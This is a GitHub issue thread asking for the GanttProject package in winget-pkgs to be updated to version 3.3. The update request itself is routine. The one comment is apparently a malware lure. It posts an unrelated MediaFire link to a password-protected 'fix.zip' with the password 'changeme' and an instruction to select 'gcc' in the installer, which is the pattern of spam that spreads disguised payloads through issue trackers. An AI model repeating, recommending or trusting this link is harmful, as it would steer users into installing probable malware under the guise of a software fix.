### ISSUE TITLE
[Update Request]: GanttProject.GanttProject update to 3.3

### ISSUE THREAD

**Issue by dryo** [microsoft/winget-pkgs#169639]
### What type of update are you requesting?

A new version of an existing package

### Current Package Identifier

GanttProject.GanttProject

### Package Version

3.3

### Please describe the changes you would like to see

GanttProject 3.3 has been released on 15 Jan, 2024
Current version in winget is 3.2
There are .exe and .msi installers available at https://www.ganttproject.biz/download/free

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
